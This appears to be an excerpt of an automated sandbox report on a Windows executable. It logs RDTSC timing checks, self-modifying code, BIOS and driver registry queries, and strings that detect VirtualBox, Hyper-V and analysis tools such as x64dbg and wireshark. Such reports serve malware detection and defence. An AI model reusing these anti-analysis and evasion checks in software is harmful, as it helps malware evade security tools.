Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B01B9 second address: 71B01D9 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7620BAC883h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B01D9 second address: 71B01DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B01DF second address: 71B0218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC884h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop esi 0x0000000f call 00007F7620BAC889h 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B0218 second address: 71B02B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov bx, cx 0x00000010 jmp 00007F7620C9DE4Ah 0x00000015 popad 0x00000016 mov dword ptr [esp+24h], 00000000h 0x0000001e jmp 00007F7620C9DE50h 0x00000023 lock bts dword ptr [edi], 00000000h 0x00000028 pushad 0x00000029 jmp 00007F7620C9DE4Eh 0x0000002e mov si, 6301h 0x00000032 popad 0x00000033 jc 00007F769122000Ch 0x00000039 pushad 0x0000003a push esi 0x0000003b push edx 0x0000003c pop esi 0x0000003d pop edx 0x0000003e pushfd 0x0000003f jmp 00007F7620C9DE52h 0x00000044 jmp 00007F7620C9DE55h 0x00000049 popfd 0x0000004a popad 0x0000004b pop edi 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F7620C9DE4Dh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B02B2 second address: 71B02C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620BAC87Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71B02C2 second address: 71B0319 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jmp 00007F7620C9DE57h 0x0000000e pop ebx 0x0000000f pushad 0x00000010 mov eax, 04B5339Bh 0x00000015 mov ah, 6Eh 0x00000017 popad 0x00000018 mov esp, ebp 0x0000001a jmp 00007F7620C9DE53h 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F7620C9DE55h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E0725 second address: 71E0790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7620BAC87Fh 0x00000008 jmp 00007F7620BAC888h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007F7620BAC87Bh 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F7620BAC886h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7620BAC887h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E0790 second address: 71E0796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E0796 second address: 71E079A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71D0B0A second address: 71D0B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71D0B0E second address: 71D0B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71D0B14 second address: 71D0B67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7620C9DE4Bh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F7620C9DE4Bh 0x00000019 or ch, FFFFFFDEh 0x0000001c jmp 00007F7620C9DE59h 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71D0B67 second address: 71D0B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71D0B6C second address: 71D0B88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7620C9DE4Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71D0B88 second address: 71D0B8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71D0B8E second address: 71D0B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71D0B92 second address: 71D0B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E09F4 second address: 71E0A3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov dh, 94h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dh, 8Bh 0x0000000f mov eax, 3EFB85E3h 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F7620C9DE56h 0x0000001b mov ebp, esp 0x0000001d jmp 00007F7620C9DE50h 0x00000022 push dword ptr [ebp+04h] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E0A3B second address: 71E0A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71E0A3F second address: 71E0A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240AF7 second address: 7240B35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov dh, 11h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dl, byte ptr [ebp+14h] 0x0000000e pushad 0x0000000f mov al, F3h 0x00000011 call 00007F7620BAC883h 0x00000016 mov eax, 0E3185AFh 0x0000001b pop ecx 0x0000001c popad 0x0000001d mov eax, dword ptr [ebp+10h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F7620BAC87Eh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240B35 second address: 7240BAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dl, 00000007h 0x0000000c pushad 0x0000000d push eax 0x0000000e call 00007F7620C9DE4Bh 0x00000013 pop eax 0x00000014 pop ebx 0x00000015 call 00007F7620C9DE56h 0x0000001a pushfd 0x0000001b jmp 00007F7620C9DE52h 0x00000020 or ax, 1198h 0x00000025 jmp 00007F7620C9DE4Bh 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d test eax, eax 0x0000002f jmp 00007F7620C9DE4Fh 0x00000034 je 00007F76911B3495h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240BAF second address: 7240BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240BB3 second address: 7240BB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240BB9 second address: 7240BD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620BAC889h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240BD6 second address: 7240BFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ecx, ecx 0x0000000d pushad 0x0000000e mov ecx, edi 0x00000010 popad 0x00000011 inc ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240BFA second address: 7240BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240BFE second address: 7240C15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240C15 second address: 7240C6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 shr eax, 1 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop esi 0x00000010 pushfd 0x00000011 jmp 00007F7620BAC87Fh 0x00000016 adc ecx, 7A68348Eh 0x0000001c jmp 00007F7620BAC889h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7220CB4 second address: 7220CC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7220CC3 second address: 7220CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7220CC9 second address: 7220CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230566 second address: 723056A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 723056A second address: 7230570 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230570 second address: 72305B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7620BAC882h 0x00000009 or cx, 9908h 0x0000000e jmp 00007F7620BAC87Bh 0x00000013 popfd 0x00000014 mov si, F37Fh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7620BAC880h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72305B1 second address: 72305F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 7F21A614h 0x00000008 push ebx 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F7620C9DE55h 0x00000015 add ch, FFFFFF86h 0x00000018 jmp 00007F7620C9DE51h 0x0000001d popfd 0x0000001e push esi 0x0000001f mov eax, ebx 0x00000021 pop edi 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 movzx ecx, dx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72305F8 second address: 72306D4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7620BAC887h 0x00000008 adc ecx, 46E8616Eh 0x0000000e jmp 00007F7620BAC889h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 movzx esi, di 0x00000019 popad 0x0000001a push esp 0x0000001b pushad 0x0000001c mov edi, ecx 0x0000001e jmp 00007F7620BAC882h 0x00000023 popad 0x00000024 mov dword ptr [esp], ebx 0x00000027 jmp 00007F7620BAC880h 0x0000002c xchg eax, esi 0x0000002d jmp 00007F7620BAC880h 0x00000032 push eax 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F7620BAC881h 0x0000003a jmp 00007F7620BAC87Bh 0x0000003f popfd 0x00000040 mov si, 489Fh 0x00000044 popad 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F7620BAC880h 0x0000004d sub esi, 5BABEC08h 0x00000053 jmp 00007F7620BAC87Bh 0x00000058 popfd 0x00000059 popad 0x0000005a mov esi, dword ptr [ebp+08h] 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F7620BAC881h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72306D4 second address: 72306DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72306DA second address: 72306DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72306DE second address: 72306E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72306E2 second address: 7230757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 00000000h 0x0000000d pushad 0x0000000e push eax 0x0000000f call 00007F7620BAC881h 0x00000014 pop esi 0x00000015 pop edi 0x00000016 pushfd 0x00000017 jmp 00007F7620BAC87Eh 0x0000001c adc cl, FFFFFFF8h 0x0000001f jmp 00007F7620BAC87Bh 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, edi 0x00000027 pushad 0x00000028 mov cl, 7Dh 0x0000002a mov bx, 89D4h 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 mov ebx, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007F7620BAC882h 0x0000003b or eax, 7E189588h 0x00000041 jmp 00007F7620BAC87Bh 0x00000046 popfd 0x00000047 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230757 second address: 723077E instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F7620C9DE57h 0x00000010 mov si, 33DFh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 723077E second address: 7230784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230784 second address: 7230788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230788 second address: 7230829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000001h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7620BAC889h 0x00000014 add ax, 94B6h 0x00000019 jmp 00007F7620BAC881h 0x0000001e popfd 0x0000001f movzx eax, bx 0x00000022 popad 0x00000023 lock cmpxchg dword ptr [esi], ecx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F7620BAC884h 0x0000002e sbb ch, 00000008h 0x00000031 jmp 00007F7620BAC87Bh 0x00000036 popfd 0x00000037 popad 0x00000038 mov ecx, eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F7620BAC87Bh 0x00000043 sub ax, 6F4Eh 0x00000048 jmp 00007F7620BAC889h 0x0000004d popfd 0x0000004e mov dx, si 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230829 second address: 723082F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 723082F second address: 7230833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230833 second address: 7230844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp ecx, 01h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e movsx edx, cx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230844 second address: 7230848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230848 second address: 72308A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, dx 0x00000009 popad 0x0000000a jne 00007F769119FBC2h 0x00000010 pushad 0x00000011 mov esi, edx 0x00000013 mov cl, dh 0x00000015 popad 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F7620C9DE57h 0x00000020 sub ah, 0000006Eh 0x00000023 jmp 00007F7620C9DE59h 0x00000028 popfd 0x00000029 jmp 00007F7620C9DE50h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72308A8 second address: 72308F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7620BAC884h 0x00000011 xor ax, 5D48h 0x00000016 jmp 00007F7620BAC87Bh 0x0000001b popfd 0x0000001c movzx eax, dx 0x0000001f popad 0x00000020 pop ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7620BAC87Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72001DB second address: 7200293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7620C9DE4Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F7620C9DE4Eh 0x00000013 push eax 0x00000014 pushad 0x00000015 push esi 0x00000016 push ebx 0x00000017 pop ecx 0x00000018 pop edi 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F7620C9DE52h 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 mov ecx, 2AE5920Dh 0x00000028 call 00007F7620C9DE4Ah 0x0000002d pushad 0x0000002e popad 0x0000002f pop ecx 0x00000030 popad 0x00000031 push eax 0x00000032 jmp 00007F7620C9DE4Ch 0x00000037 mov dword ptr [esp], ecx 0x0000003a pushad 0x0000003b movzx eax, bx 0x0000003e pushfd 0x0000003f jmp 00007F7620C9DE53h 0x00000044 xor al, 0000001Eh 0x00000047 jmp 00007F7620C9DE59h 0x0000004c popfd 0x0000004d popad 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F7620C9DE58h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7200293 second address: 72002A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72002A2 second address: 72002C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72002C7 second address: 72002CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72002CB second address: 72002DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72002DE second address: 7200304 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 1Bh 0x00000005 movzx esi, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7620BAC886h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7200335 second address: 720033B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 720033B second address: 720033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7200011 second address: 7200016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7200016 second address: 7200060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7620BAC87Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F7620BAC87Ch 0x00000019 sub ecx, 78E66478h 0x0000001f jmp 00007F7620BAC87Bh 0x00000024 popfd 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSpecial instruction interceptor: First address: B5E0BA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSpecial instruction interceptor: First address: D28A81 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSpecial instruction interceptor: First address: B60CAB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeSpecial instruction interceptor: First address: D93572 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_005F9980 rdtsc 5_2_005F9980
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0041255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,5_2_0041255D
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004129FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,5_2_004129FF
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0041255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,5_2_0041255D
Source: ZN34wF8WI2.exe, ZN34wF8WI2.exe, 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: ZN34wF8WI2.exeBinary or memory string: Hyper-V RAW
Source: ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
